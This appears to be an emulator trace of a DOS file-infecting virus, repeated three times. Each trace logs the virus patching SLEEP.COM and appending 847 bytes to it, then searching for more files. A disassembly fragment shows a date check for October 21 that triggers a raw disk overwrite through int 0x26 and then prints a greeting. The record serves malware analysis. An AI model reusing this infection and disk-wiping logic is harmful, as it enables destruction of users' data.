2018-12-25T11:52:35.735538683Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.737008798Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.739823429Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.745464784Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.751267377Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.767011026Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.773295409Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.775095863Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.781294923Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.782194967Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.784376508Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.78575611Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.793957378Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.796679691Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.801274366Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.809643225Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.816213081Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.82279529Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.825720882Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.831662315Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.842048914Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.853184454Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.85468681Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.870564595Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.872494698Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.875261466Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.877970692Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.886121608Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.887533914Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.8928267Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.900794172Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.906455818Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.91337947Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.916263609Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.926581819Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.938852803Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.947706869Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.949081669Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.954182097Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.955358343Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.957151066Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.958452593Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.963887883Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.965031961Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.968128042Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.973758092Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.977435465Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:35.981213843Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:35.983482096Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.990198085Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.997990267Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.005678868Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.006962228Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.013519038Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.018663085Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.021085865Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.022343839Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.030713928Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.03191457Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.034844944Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.040115573Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.045597178Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.050987071Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.05385253Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.063731209Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.075159869Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.083106145Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.084516484Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.090702553Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.09238026Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.094867982Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.096102591Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.104170775Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.105507521Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.109955844Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.1177185Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.123447151Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.129093927Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.140020182Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.146243482Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:36.147822871Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21
2018-12-25T11:52:36.150799299Z 9 PC: 12cb4 | Display string (String= 'Happy Birthday Freaky!')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:35.810381674Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:35.812069386Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:35.815174752Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:35.821947128Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:35.828412517Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:35.845412932Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:35.858199288Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:35.85968839Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:35.867587025Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:35.869127408Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:35.872025542Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:35.874108756Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:35.886015038Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:35.887552048Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:35.893095252Z 62 PC: 12c21 | Close file
2018-12-25T11:52:35.901303625Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:35.907818415Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:35.920491721Z 79 PC: 12bab | Find next file
2018-12-25T11:52:35.922454653Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:35.926756501Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:35.934263887Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:35.941579624Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:35.943120911Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:35.950938443Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:35.961439844Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:35.964642827Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:35.966539293Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:35.975786694Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:35.977306857Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:35.982457577Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:35.991448281Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:35.998847948Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.005535349Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.008922435Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.014991561Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.026005021Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.033880189Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.035430642Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.042534809Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.044837619Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.048619956Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.050614132Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.060319318Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.061913481Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.06762101Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.076317868Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.083589179Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.08997807Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.0927065Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.099551262Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.110376373Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.122981877Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.125444305Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.130113323Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.131205966Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.134620821Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.135905305Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.141231071Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.143716308Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.147189103Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.156305687Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.163897718Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.170275993Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:36.172939498Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:36.184606389Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:36.198136004Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:36.205056776Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:36.206448433Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:36.213459729Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:36.214880633Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:36.217627212Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:36.219830452Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:36.228207803Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:36.230882923Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:36.23649409Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:36.244783001Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.250977115Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.263461285Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:36.26729958Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:36.271179801Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:36.272600898Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21

{"DateBased":true,"Day":1,"Month":10,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4633,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:36.811998075Z 26 PC: 12b66 | Set disk transfer address
2018-12-25T11:52:36.814081003Z 71 PC: 12b70 | Get current directory
2018-12-25T11:52:36.817209584Z 78 PC: 12b86 | Find first file
2018-12-25T11:52:36.822960789Z 67 PC: 12bb8 | Get or set file attributes
2018-12-25T11:52:36.833728848Z 67 PC: 12bc8 | Get or set file attributes
2018-12-25T11:52:37.164112249Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:37.170630498Z 87 PC: 12bd7 | Get or set file date and time
2018-12-25T11:52:37.172344123Z 63 PC: 12bec | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:37.179385231Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:52:37.181025641Z 64 PC: 12c5a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:37.183873536Z 66 PC: 12c62 | Move file pointer
2018-12-25T11:52:37.186427144Z 64 PC: 12c6d | Write file or device (Write 847 bytes on handle 5)
2018-12-25T11:52:37.19563242Z 87 PC: 12c0f | Get or set file date and time
2018-12-25T11:52:37.197101873Z 67 PC: 12c1d | Get or set file attributes
2018-12-25T11:52:37.202898128Z 62 PC: 12c21 | Close file
2018-12-25T11:52:37.210553296Z 78 PC: 12cc1 | Find first file
2018-12-25T11:52:37.216511957Z 78 PC: 12ce9 | Find first file
2018-12-25T11:52:37.228761206Z 79 PC: 12bab | Find next file
2018-12-25T11:52:37.231553979Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.23748499Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.247656157Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.254112597Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.255504513Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.266381751Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.267697834Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.270213579Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.272910002Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.280826382Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.282670856Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.287614898Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.300099614Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.306266245Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.312824178Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:37.315553634Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.321405021Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.33145887Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.343030446Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.344751559Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.351443393Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.353461458Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.356182633Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.358278228Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.36704948Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.368478191Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.3744557Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.382855441Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.389203089Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.394887802Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:37.398111627Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.408831065Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.422482681Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.430394755Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.432413306Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.438636203Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.440790972Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.443192024Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.444872854Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.453428781Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.45526682Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.459959323Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.472047887Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.478773906Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.490334536Z 79 PC: 12bab | Find next file (See above)
2018-12-25T11:52:37.493055659Z 67 PC: 12bb8 | Get or set file attributes (See above)
2018-12-25T11:52:37.498733063Z 67 PC: 12bc8 | Get or set file attributes (See above)
2018-12-25T11:52:37.508430105Z 61 PC: 12bd1 | Open file (See above)
2018-12-25T11:52:37.51515859Z 87 PC: 12bd7 | Get or set file date and time (See above)
2018-12-25T11:52:37.517019207Z 63 PC: 12bec | Read file or device (See above)
2018-12-25T11:52:37.52323733Z 66 PC: 12c4f | Move file pointer (See above)
2018-12-25T11:52:37.524658866Z 64 PC: 12c5a | Write file or device (See above)
2018-12-25T11:52:37.527510542Z 66 PC: 12c62 | Move file pointer (See above)
2018-12-25T11:52:37.528897088Z 64 PC: 12c6d | Write file or device (See above)
2018-12-25T11:52:37.536762283Z 87 PC: 12c0f | Get or set file date and time (See above)
2018-12-25T11:52:37.538686785Z 67 PC: 12c1d | Get or set file attributes (See above)
2018-12-25T11:52:37.543152619Z 62 PC: 12c21 | Close file (See above)
2018-12-25T11:52:37.550538986Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.55739188Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.562920429Z 78 PC: 12cc1 | Find first file (See above)
2018-12-25T11:52:37.568473983Z 78 PC: 12ce9 | Find first file (See above)
2018-12-25T11:52:37.574294732Z 59 PC: 12c80 | Change current directory
2018-12-25T11:52:37.575779754Z 42 PC: 12c84 | Get date 0x12c84: cmp dh, 0xa
0x12c87: jne 0x12c91
0x12c89: cmp dl, 0x15
0x12c8c: jne 0x12c91
0x12c8e: jmp 0x12c9f
0x12c90: nop
0x12c91: ret
0x12c92: mov ah, 0x3b
0x12c94: lea dx, word ptr [bp + 0x407]
0x12c98: int 0x21
0x12c9a: jb 0x12c74
0x12c9c: jmp 0x12b76
0x12c9f: mov al, 2
0x12ca1: mov cx, 0x29a
0x12ca4: mov dx, 0
0x12ca7: mov bx, 0x2c0
0x12caa: int 0x26
0x12cac: lea dx, word ptr [bp + 0x43b]
0x12cb0: mov ah, 9
0x12cb2: int 0x21